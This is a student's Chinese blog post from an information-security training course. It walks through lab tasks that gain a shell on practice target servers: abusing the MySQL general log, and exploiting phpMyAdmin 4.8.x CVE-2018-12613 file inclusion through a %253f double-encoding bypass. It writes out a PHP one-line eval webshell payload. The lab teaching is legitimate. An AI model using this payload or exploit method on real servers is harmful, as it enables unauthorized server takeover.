信息安全实训第五天

最新推荐文章于 2024-07-25 21:40:10 发布
最新推荐文章于 2024-07-25 21:40:10 发布
阅读量446 收藏 10
点赞数 19
文章标签: 安全 web 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75034448/article/details/138680638
版权

实训目的

了解拒绝服务攻击Dos和分布式拒绝服务攻击DDos原理。

了解Web入侵的一般步骤。

能进行拒绝服务攻击的流量分析。

能进行Web入侵的溯源分析。

实训准备及注意事项

1.硬件:windows攻击机一台、windows、linux服务器各一台。

2.软件:后台扫描工具、phpstudy、靶站两个。   

3.严格按照实验步骤进行实验,实验结果以截图的形式进行保留。

实训任务1 Web站点渗透一

  1. 平台内分别启动靶机(启动即可无需其他操作)和攻击机(左下角课程工具中),后续操作全部在攻击机中完成。
  2. 在攻击机中根据靶机IP地址使用chrome浏览器打开并浏览靶机中架设的网站。
  3. 合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。
  4. 根据可疑端口、地址或文件,设法找到网站数据库连接的地址和root密码。
  5. root权限登录网站数据库后,尝试利用日志文件来进行 getshell。首先在 sql 处执行“SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径。
  6. 使用webshell管理工具连接创建的shell.php文件,控制服务器。

实训一操作

1.对网站扫描的结果

2.成功登入数据库后台界面,mysql日志功能成功开启的界面

3.网站在服务器中的绝对地址信息

4.在浏览器中成功访问shell.php的界面,webshell工具成功控制服务器的界面

实训任务2 Web站点渗透二

  1. 平台内分别启动靶机(启动即可无需其他操作)和攻击机(左下角课程工具中),后续操作全部在攻击机中完成。
  2. 在攻击机中根据靶机IP地址使用chrome浏览器打开并浏览靶机中架设的网站。
  3. 合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。
  4. 根据可疑端口、地址或文件,设法找到网站数据库连接的地址和密码。
  5. 登录网站数据库后,查看数据库管理系统的版本号,并在互联网中搜索是否有可以利用的安全漏洞。参考内容:phpMyAdmin 4.8.x 本地文件包含漏洞利用 | Vulnspy Blog
  6. 利用 CVE-2018-12613 进行 getshell。在 SQL 语句执行处执行SELECT “ <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>” ,这句话的含义为向 shell.php 文件中写入一句话木马(但还没有真正成功创建)。
  7. 打开浏览器的开发者工具(F12)获取sessionIDphpmyadminsession会保存近期执行过的sql语句)。
  8. 根据漏洞利用原理:PHP会自动urldecode一次加百分号的参数,提交%253f?urlencodeurlencode的时候自动转成%3f,满足该版本软件的白名单条件不会被后台过滤掉,此时%253f/就会被认为是一个目录,从而include。即? -> %3f -> %253f
  9. 使用webshell管理工具连接创建的shell.php文件,控制服务器。

实训二操作

1。找到的用于连接数据库的用户名和密码,找到数据库管理系统的版本号信息,

截取查询到的sessionID

2.利用漏洞构造的文件包含url,截取成功控制服务器的界面

美好的一天结束了!

gky-gky
关注
  • 19
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-1388: Windows UAC 提权
Ms08067安全实验室
12-13 759
漏洞简介该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示 Secure ...
看我如何从外网直接拿下内网靶标
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 748
1.拿到目标制定策略进行信息收集 某地攻防演练拿到演习目标后,进行了一波常规信息收集,打了一个靶标发现靶标分数有点高还是打靶标来得快,于是对所有靶标进行分析。但是大部分靶标都给的是内网地址, 观察了一下收集的所有目标ip发现基本上存在于xx.xx.98.x-xx.xx.106.x这个范围 主动扩大范围扫描x.x.95.x-x.x.110.x这些段,直接通过fofa api查询所有记录 然后使用我B哥的webalivescan扫描 https://github.com/broken5/
信息安全实训第五天ctf竞赛 WriteUp
ybj100的博客
04-19 695
SQL注入(SQL Injection)是一种代码注入技术,攻击者通过在应用程序的输入字段中插入(或“注入”)恶意的SQL代码,从而欺骗应用程序的后端数据库服务器执行非授权的任意SQL命令。当开发者希望代码更灵活,将被包含的文件设置为变量,通过动态变量来引入需要包含的文件时,如果服务器端未对变量值进行合理地校验或者校验被绕过,就可能导致文件包含漏洞。文件包含是程序开发中的一项常用技术,它允许开发者将重复使用的函数或代码片段写入单个文件中,然后在需要的地方直接引用这个文件,而不是重复编写相同的代码。
信息安全第三天实训内容总结
ybj100的博客
04-18 627
其中一个更大的优势在于由于phpMyAdmin跟其他PHP程序一样在网页服务器上执行,但是您可以在任何地方使用这些程序产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。利用文件包含漏洞的方法有多种,例如利用包含漏洞将用户上传的恶意代码由包含函数加载并执行,或者向Web日志中插入恶意代码并通过文件包含漏洞执行。为了防御文件包含漏洞,可以采取一些措施,如对用户提交的文件路径进行有效的验证和过滤,以防止恶意文件路径被提交;使用安全的编程实践和框架来减少漏洞的可能性等。
网络安全实训报告.doc
07-09
网络安全实训报告 ——X-Scan漏洞扫描 学生姓名: 指导教师: 马玉萍 班 级: 计算机0954 学 号: 2011年06月 信息工程学院 目录 第一章 概述 1 1.1 设计的目的(意义) 2 1.2 漏洞扫描简介 3 1.3 课程设计的内容 4 ...
外贸单证实务与实训参考答案.doc
07-01
以上知识点是外贸单证实务与实训中的基础,掌握这些知识对于从事外贸工作的人员至关重要,能够确保业务操作的规范性和安全性,避免因单证问题导致的经济损失。在实际工作中,还需要结合具体的贸易条款、国家政策和...
Android企业实训专项方案.docx
11-24
包含日常考勤管理,项目过程中进度管理,质量管理,申报管理和信息安全管理等。 Android 实训体系 Android 实训体系分两阶段实施。第一阶段:Android 基础知识强化在该阶段,由项目经理依据项目标需要,强化受训...
计算机网络安全技术与实训第3章.pdf
10-10
"计算机网络安全技术与实训第3章.pdf" 本章要点: 1. 操作系统安全的概念和安全评估准则 2. 应急启动盘的制作 3. Windows 操作系统中账号和权限设置 4. Windows 系统和服务安全配置 5. Linux 操作系统的安全配置 ...
第6单元:实训-小型校园网网络解决方案的设计与实施.docx
06-19
小型校园网网络解决方案的设计与实施 ...通过本实训,学生可以学习到小型校园网网络解决方案的设计和实施,提高其网络管理和维护的能力,同时也可以提高其安全意识和保护网络中数据和用户信息的能力。
企业如何保证公司内网安全
shunyou0526的博客
07-25 181
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 192
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 288
2024安全大模型技术与市场研究报告
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 542
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境传感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
一线工作中常用 Shell 脚本: Jar包部署为linux系统服务; 恶意访问,安全防范; SSH 免交互执行命令;
最新发布
iOS逆向与安全
07-25 69
当要使用多个不同的private key登录不同的主机时,我们可以在ssh命令里面用-i参数指定每次使用的private key文件。需求: 通过脚本自动化部署(自动远程登录、远程复制本地资源到服务器,远程执行部署相关命令。之间,remotessh可以随便修改成其他形式的字符串。可以利用~/.ssh/config文件,在让ssh自动为我们决定应该使用哪个key。在文本中搜索指定的内容——grep命令的常用选项。远程执行的命令内容较多,使用脚本方式实现。方法2:通过TCP建立的连接。
保障企业数据主权:安全可控的爬虫工具与管理平台
zhou6343178的博客
07-25 413
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 464
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
后台管理系统登录安全和权限要求
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-25 545
启用MFA后,系统将要求输入用户名和密码(第一安全要素),再进行输入来自其 MFA设备的动态验证码(第二安全要素),双因子的安全认证将为您的账户提供更高的安全保护。传统的用户名和密码认证容易受到破解、盗取或暴力破解等攻击方式的威胁,而双因子认证可以提供额外的安全层次,确保只有授权用户才能访问账户或系统。通过采用双因子认证,企业可以增加用户账号的安全性,降低身份盗窃和欺诈行为的风险,提高用户对系统的信任度。这在网络安全是极不安全的。订单管理:用于管理订单信息,包括查看订单、修改订单状态、发货、退货、退款等。
计算机网络安全技术实训与应用指南
该书在当前社会背景下显得尤为重要,随着信息技术的发展,计算机网络已经成为推动社会经济、国防建设和日常生活的关键力量,但同时也面临着严峻的信息安全挑战。 本书共分为九章,以实践和应用为核心,引导读者步入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值